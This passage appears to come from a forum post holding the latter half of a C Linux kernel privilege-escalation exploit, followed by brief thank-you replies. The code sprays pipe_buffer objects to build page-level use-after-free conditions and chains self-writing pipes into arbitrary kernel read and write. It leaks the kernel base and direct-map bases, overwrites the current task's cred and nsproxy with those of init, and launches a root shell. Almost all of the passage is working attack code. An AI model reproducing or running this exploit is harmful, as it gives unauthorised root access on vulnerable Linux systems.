    printf("\033[0m\033[1;34mWe found the victim_pid:%d, original_pid:%d\033[0m\n", victim_pid, orig_pid);

}

struct pipe_buffer {
        struct page *page;
        unsigned int offset, len;
        const struct pipe_buf_operations *ops;
        unsigned int flags;
        unsigned long private;
};

#define SECOND_PIPE_BUF_SZ 96
struct pipe_buffer info_pipe_buffer;
int victim_second_pid = -1, orig_second_pid;

void construct_second_uaf(){
    int second_pipe_sz = 0x1000 * (SECOND_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
    size_t buf[0x1000] = {0};
    memset(buf, '\x00', sizeof(buf));
    size_t pipe_buf[0x100];
    info_log("Step III:Construct the second page level uaf...");
    write(pipe_fd[victim_pid][1], buf, SECOND_PIPE_BUF_SZ*2 - 3*8 - 3*sizeof(int));

    puts("Free the original pipe...");
    close(pipe_fd[orig_pid][0]);
    close(pipe_fd[orig_pid][1]);

    puts("Spraying the smaller pipe_buffer...");
    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx || i == victim_pid || i == orig_pid){
            continue;
        }
        if(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, second_pipe_sz) < 0){
            error_log("realloc the pipe_buffer failed!");
        }
    }
    memset(pipe_buf, '\x00', sizeof(pipe_buf));
    read(pipe_fd[victim_pid][0], buf, SECOND_PIPE_BUF_SZ - 8 - 4);
    read(pipe_fd[victim_pid][0], pipe_buf, 0x28);

    for(int i = 0; i < 0x28/8; i++){
        printf("[--- data dump ---][%d] %lx\n", i, pipe_buf[i]);
    }
    memcpy(&info_pipe_buffer, pipe_buf, 0x28);

    printf("\033[0m\033[1;34minfo_pipe_buffer->page    :%p\033[0m\n", info_pipe_buffer.page);
    printf("\033[0m\033[1;34minfo_pipe_buffer->offset  :%d\033[0m\n", info_pipe_buffer.offset);
    printf("\033[0m\033[1;34minfo_pipe_buffer->len     :%d\033[0m\n", info_pipe_buffer.len);
    printf("\033[0m\033[1;34minfo_pipe_buffer->ops     :%p\033[0m\n", info_pipe_buffer.ops);
    printf("\033[0m\033[1;34minfo_pipe_buffer->flags   :%d\033[0m\n", info_pipe_buffer.flags);
    printf("\033[0m\033[1;34minfo_pipe_buffer->private :%ld\033[0m\n", info_pipe_buffer.private);

    for(int i = 0; i < 35; i++){
        write(pipe_fd[victim_pid][1], &info_pipe_buffer, 0x28);
        write(pipe_fd[victim_pid][1], buf, SECOND_PIPE_BUF_SZ - 0x28);
    }
    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        int nr;
        char tmp[0x10];
        if(i == victim_qidx || i == victim_pid || i == orig_pid){
            continue;
        }
        read(pipe_fd[i][0], &nr, sizeof(int));
        if(nr < PIPE_SPRAY_NR && nr != i){
            orig_second_pid = i;
            victim_second_pid = nr;
        }
    }
    if(victim_second_pid == -1){
        error_log("Can not find the second victim pid");
    }
    printf("\033[0m\033[1;34mWe found the 2nd victim_pid:%d, 2nd original_pid:%d\033[0m\n", victim_second_pid, orig_second_pid);

}

struct pipe_buffer evil_pipe_buffer;
#define THIRD_PIPE_BUF_SZ 192
int self_2nd_pid = -1, self_3rd_pid = -1, self_4th_pid = -1;

void build_self_writing_pipe(){
    info_log("Step IV:Building the self-writing pipe...");
    size_t buf[0x1000];
    struct page * tmp_page;
    int third_pipe_sz = 0x1000*(THIRD_PIPE_BUF_SZ/sizeof(struct pipe_buffer));

    memset(buf, '\x00', sizeof(buf));

    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 3*8 - 3*sizeof(int));
    puts("Free the original second pipe...");
    close(pipe_fd[orig_second_pid][0]);
    close(pipe_fd[orig_second_pid][1]);

    puts("Spraying the smaller pipe_buffer...");

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid){
            continue;
        }
        if(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, third_pipe_sz) < 0){
            error_log("Realloc the 192 pipe_buffers failed!");
        }
    }

    memcpy(&evil_pipe_buffer, &info_pipe_buffer, 0x28);
    evil_pipe_buffer.offset = THIRD_PIPE_BUF_SZ;
    evil_pipe_buffer.len = THIRD_PIPE_BUF_SZ;

    puts("Construct the 2nd self read/write pipe...");
    write(pipe_fd[victim_second_pid][1], &evil_pipe_buffer, 0x28);
    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 0x28);

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid){
            continue;
        }
        read(pipe_fd[i][0], &tmp_page, sizeof(size_t));
        if(tmp_page == evil_pipe_buffer.page){
            self_2nd_pid = i;
            break;
        }
    }
    if(self_2nd_pid == -1){
        error_log("Find the 2nd self pipe failed!");
    }

    puts("Construct the 3rd self read/write pipe...");
    write(pipe_fd[victim_second_pid][1], &evil_pipe_buffer, 0x28);
    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 0x28);

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx 
           || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid
           || i == self_2nd_pid){
            continue;
        }
        read(pipe_fd[i][0], &tmp_page, sizeof(size_t));
        if(tmp_page == evil_pipe_buffer.page){
            self_3rd_pid = i;
            break;
        }
    }
    if(self_3rd_pid == -1){
        error_log("Find the 3rd self pipe failed!");
    }

    puts("Construct the 4th self read/write pipe...");
    write(pipe_fd[victim_second_pid][1], &evil_pipe_buffer, 0x28);
    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 0x28);

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx 
           || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid
           || i == self_2nd_pid
           || i == self_3rd_pid){
            continue;
        }
        read(pipe_fd[i][0], &tmp_page, sizeof(size_t));
        if(tmp_page == evil_pipe_buffer.page){
            self_4th_pid = i;
            break;
        }
    }
    if(self_4th_pid == -1){
        error_log("Find the 4th self pipe failed!");
    }
}

struct pipe_buffer evil_2nd_pipe;       /* pipe_buffer page offset 192 */
struct pipe_buffer evil_3rd_pipe;       /* pipe_buffer page offset 192*2 */
struct pipe_buffer evil_4th_pipe;       /* pipe_buffer page offset 192*3 */

void setup_evil_pipe(){

    puts("initial the three pipe_buffer...");
    memcpy(&evil_2nd_pipe, &info_pipe_buffer, 0x28);
    memcpy(&evil_3rd_pipe, &info_pipe_buffer, 0x28);
    memcpy(&evil_4th_pipe, &info_pipe_buffer, 0x28);

    evil_2nd_pipe.offset = 0;
    evil_2nd_pipe.len = 0xff0;

    puts("Hijack the 3rd pipe_buffer to point to the 4th location...");
    evil_3rd_pipe.offset = 3*THIRD_PIPE_BUF_SZ;
    evil_3rd_pipe.len = 0;

    /* make 3rd pipe_buffer point to the 4th_pipe_buffer */
    write(pipe_fd[self_4th_pid][1], &evil_3rd_pipe, sizeof(evil_4th_pipe));     

    evil_4th_pipe.offset = THIRD_PIPE_BUF_SZ;
    evil_4th_pipe.len = 0;
}

char tmp_zero_buf[0x1000] = {'\x00'};
void arbitrary_read_by_pipe(struct page* page_to_read, void* dst){
    /* construct the self_2nd_pipe for reading the page_to_read */
    evil_2nd_pipe.offset = 0;
    evil_2nd_pipe.len = 0xfff;
    evil_2nd_pipe.page = page_to_read;

    /* let the 4th pipe_buffer point to the 2nd buffer */
    write(pipe_fd[self_3rd_pid][1], &evil_4th_pipe, sizeof(evil_3rd_pipe));     

    /* hijack the 2nd pipe for arbitrary read */
    write(pipe_fd[self_4th_pid][1], &evil_2nd_pipe, sizeof(evil_4th_pipe));
    write(pipe_fd[self_4th_pid][1], tmp_zero_buf, THIRD_PIPE_BUF_SZ - sizeof(evil_4th_pipe));   /* 4th point to the 3rd */

    /* recover the initial context */
    write(pipe_fd[self_4th_pid][1], &evil_3rd_pipe, sizeof(evil_4th_pipe)); 

    read(pipe_fd[self_2nd_pid][0], dst, 0xff8);
}

void arbitrary_write_by_pipe(struct page* page_to_write, void* rsc, size_t len){
    /* construct the self_2nd_pipe for writing the page_to_write */
    evil_2nd_pipe.offset = 0;
    evil_2nd_pipe.len = 0;
    evil_2nd_pipe.page = page_to_write;
    /* let the 4th pipe_buffer point to the 2nd buffer */
    write(pipe_fd[self_3rd_pid][1], &evil_4th_pipe, sizeof(evil_4th_pipe));

    /* hijack the 2nd pipe for arbitrary write */
    write(pipe_fd[self_4th_pid][1], &evil_2nd_pipe, sizeof(evil_2nd_pipe));
    write(pipe_fd[self_4th_pid][1], tmp_zero_buf, THIRD_PIPE_BUF_SZ - sizeof(evil_2nd_pipe));

    /* recover the initial context */
    write(pipe_fd[self_4th_pid][1], &evil_3rd_pipe, sizeof(evil_3rd_pipe));

    write(pipe_fd[self_2nd_pid][1], rsc, len);

}

size_t parent_task, current_task;
size_t vmemmap_base, kernel_base, kernel_offset, page_offset_base;

void info_leaking_by_arbitrary_pipe(){
    info_log("Step V:Leaking the kernel base addr by arbitrary read...");
    size_t page_buf[0x2000];
    setup_evil_pipe();
    size_t *comm_addr;
    size_t ptraced;
    int try_hits = 0;

    vmemmap_base = (size_t)(info_pipe_buffer.page)&0xfffffffff0000000;
    for(;;){
        puts("Checking for the vmemmap_base's reality...");
        printf("\033[0m\033[1;34mpossible vmemmap_base:%p\033[0m\n", (void*)vmemmap_base);
        /*
         * We need to know physmap + 0x9d000 fun ptr
         * so we should check vmemmap_base + (0x9d000/0x1000)*0x40
         * */
        arbitrary_read_by_pipe((struct page*)(vmemmap_base + 157*0x40), page_buf);
        if(page_buf[0] == 0x2400000000){
            error_log("reading failed!");
        }
        if(page_buf[0] > 0xffffffff81000000 && (page_buf[0]&0xfff) == 0x030){
            kernel_base = page_buf[0] - 0x30;
            kernel_offset = kernel_base -  0xffffffff81000000;
            printf("\033[0m\033[1;34mkernel_base    :%p\033[0m\n", (void*)kernel_base);
            printf("\033[0m\033[1;34mkernel_offset  :%p\033[0m\n", (void*)kernel_offset);
            break;
        }
        try_hits++;
        if(try_hits == 5){
            vmemmap_base -= 0x10000000;
            try_hits = 0;
        }
    }

    printf("\033[0m\033[1;34mvmemmap_base   :%p\033[0m\n", (void*)vmemmap_base);
    puts("Leak the page_offset_base...");

    for(int i = 1; 1 ;i++){
        arbitrary_read_by_pipe((struct page*)(vmemmap_base + (i-1)*0x40), page_buf);
        arbitrary_read_by_pipe((struct page*)(vmemmap_base + i*0x40), &((char*)page_buf)[0x1000]);
        /* find the struct task_struct.comm */
        comm_addr = (size_t*)memmem(page_buf, 0x1ff0,"PEIWITHHAO", 10);
        if(comm_addr == NULL){
            continue;
        }
        if((((size_t)comm_addr - (size_t)page_buf)&0xfff) < 500){
            continue;
        }
        //printf("comm_addr[-2]:%lx\n", comm_addr[-2]);
        //printf("comm_addr[-3]:%lx\n", comm_addr[-3]);
        //printf("comm_addr[-52]:%lx\n", comm_addr[-52]);
        //printf("comm_addr[-53]:%lx\n", comm_addr[-53]);
        /* all four fields must look like direct-map pointers */
        if(comm_addr[-2] > 0xffff888000000000       /* task.cred        */
           && comm_addr[-3] > 0xffff888000000000    /* task.real_cred   */
           && comm_addr[-52] > 0xffff888000000000   /* task.parent      */
           && comm_addr[-53] > 0xffff888000000000){ /* task.real_parent */
            parent_task = comm_addr[-53];
            ptraced = comm_addr[-46];               /* task.ptraced     */
            current_task = (comm_addr[-46] - 2280);        /* current_task */
            page_offset_base = (size_t)current_task - i*0x1000;
            page_offset_base &= 0xfffffffff0000000;
            PRINT_ADDR("current_task", current_task);
            PRINT_ADDR("parent_task", parent_task);
            PRINT_ADDR("page_offset_base", page_offset_base);

            break;
        }
    }
}

size_t direct_mapping_addr2page(size_t addr){
    size_t page_nr = ((addr&(~0xfff)) - page_offset_base)/0x1000;
    return (vmemmap_base + page_nr*0x40);
}

size_t page_buf[0x8000];
size_t init_task, init_cred, init_nsproxy;
void priviledge_escalation(){
    size_t *task_buf;
    size_t parent_page;
    info_log("Step VI:Hijack the current_task to get the root...");
    for(;;){
        parent_page = direct_mapping_addr2page(parent_task);
        task_buf = (size_t*)((size_t)page_buf + (parent_task & 0xfff));
        arbitrary_read_by_pipe((struct page*)parent_page, page_buf);
        arbitrary_read_by_pipe((struct page*)(parent_page + 0x40), &page_buf[0x1000/8]);

        /* task_struct.real_parent offset is 2224 */
        if(parent_task == task_buf[2224/8]){
            break;
        }
        parent_task = task_buf[2224/8];
    }
    init_task = parent_task;
    /* task_struct.cred offset is 2632 */
    init_cred = task_buf[2632/8];
    init_nsproxy = task_buf[341];
    PRINT_ADDR("init_task", (size_t)init_task);
    PRINT_ADDR("init_cred", (size_t)init_cred);
    PRINT_ADDR("init_nsproxy", (size_t)init_nsproxy);

    puts("Escalating root privilege now!");
    size_t current_page;
    current_page = direct_mapping_addr2page(current_task);

    memset(page_buf, '\x00', sizeof(page_buf));
    arbitrary_read_by_pipe((struct page*)current_page, page_buf);
    arbitrary_read_by_pipe((struct page*)(current_page + 0x40), &page_buf[0x1000/8]);

    task_buf = (size_t*)((size_t)page_buf + (current_task & 0xfff));
    task_buf[2632/8] = init_cred;
    task_buf[2624/8] = init_cred;
    task_buf[341] = init_nsproxy;
    arbitrary_write_by_pipe((struct page*)current_page, page_buf, 0xff0);
    arbitrary_write_by_pipe((struct page*)(current_page + 0x40), &page_buf[0x1000/8], 0xff0);
    puts("[+]Done!");
}

void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}
int msg_pipe[2];
int main(void)
{   
    pipe(msg_pipe);
    bind_cpu(0);

    if(!fork()){
        unshare(CLONE_NEWNS | CLONE_NEWUSER);
        occupy_4k_obj_by_msg();sleep(1);
        construct_first_uaf();sleep(1);
        construct_second_uaf();sleep(1);
        build_self_writing_pipe();sleep(1);
        info_leaking_by_arbitrary_pipe();sleep(1);
        priviledge_escalation();
        write(msg_pipe[1], "peiwithhao", 10);
        sleep(114514);
        return 0;
    }else{
        if(prctl(PR_SET_NAME, "PEIWITHHAO") < 0){
            error_log("failed to prctl!");
        }
        char ch;
        read(msg_pipe[0], &ch, 1);
    }
    get_root_shell();
}


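hy8051hy · posted on 2023-10-12 07:41

Thanks to the OP for sharing! This definitely deserves a bump!!!

h888866j · posted on 2023-10-12 08:34

That's long. How long did it take to write?

Airey · posted on 2023-10-12 08:42

Really impressive, thanks for sharing.

wang180 · posted on 2023-10-12 09:39

Thanks for sharing.

zhaoyf18 · posted on 2023-10-12 11:06

Impressive!

TL1ng · posted on 2023-10-12 13:12

Thanks for the guidance.

高苗苗 · posted on 2023-10-13 11:21

I really admire experts like you.

ytdzjun · posted on 2023-10-13 16:28

Speechless admiration~

mcby · posted on 2023-10-13 19:24

Awesome work.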
